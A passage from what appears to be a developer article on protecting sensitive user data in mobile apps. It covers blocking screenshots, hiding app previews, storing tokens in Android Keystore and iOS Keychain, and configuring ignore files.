development cycle. While we may have PII data hidden by sensitive filters in the code and log console, it’s still possible that the sensitive data value is shown on the UI. Make sure to disable screenshot ability and background preview on such screens. Android – Disable Screenshot window.setFlags(WindowManager.LayoutParams.FLAG_SECURE, WindowManager.LayoutParams.FLAG_SECURE) Android – Hide Sensitive Screen on Recent Apps List This StackOverflow post covers the logic in lifecycle onPause() and onResume() to hide an app’s screen from Recent Apps List on Android. It may not work on older Android versions (i.e., pre-Android 8/Oreo), so you may have to opt for more robust measures like setting android:excludeFromRecents="true" in your manifest, or self-replacing the screen with a black image temporarily. iOS – Replace Task Switcher Thumbnail This document covers how to hide sensitive information from the Task Switcher preview. Store Sensitive Data in Mobile App with System Secret Manager Avoid storing sensitive data on your app (though sometimes it’s inevitable) like storing an access token in local storage. Android Always store such tokens in Android Keystore. Here’s a sample flow we’ve adopted lately: Generate an AES key first (per app) and store it in Android Keystore. Encrypt tokens with the AES key before saving to SharedPreference. iOS Always go with Keychain Services. Set your .gitignore, .dockerignore and .gcloudignore properly A developer with less experience can set up a repo’s .gitignore properly right at the start. But s/he may never realize if other ignore files like .dockerignore are not configured carefully, which can lead to a lot of security problems. The internet is loaded with all kinds of ignore file templates and discussions on them, so be sure to study thoroughly when you are not sure if yours is correct enough! Conclusion So, there you have it! Data masking blocks certain fields and pieces of data from being visible. These data obfuscation techniques help prevent sensitive information from being visible while preserving the data’s integrity and the overall semantics. The takeaway here is that there’s no silver bullet for data masking and preventing sensitive data exposure. Depending on the business requirements, use cases,and the data you’re working with, some techniques will be more relevant and need to be consistently applied than others. There are also solutions with different stacks, like an authentication solution for web and mobile apps that went through rounds of security audit. For self-maintained ones, you’ll have to take up the responsibility in securing PII. Source
×
×
  • Create New...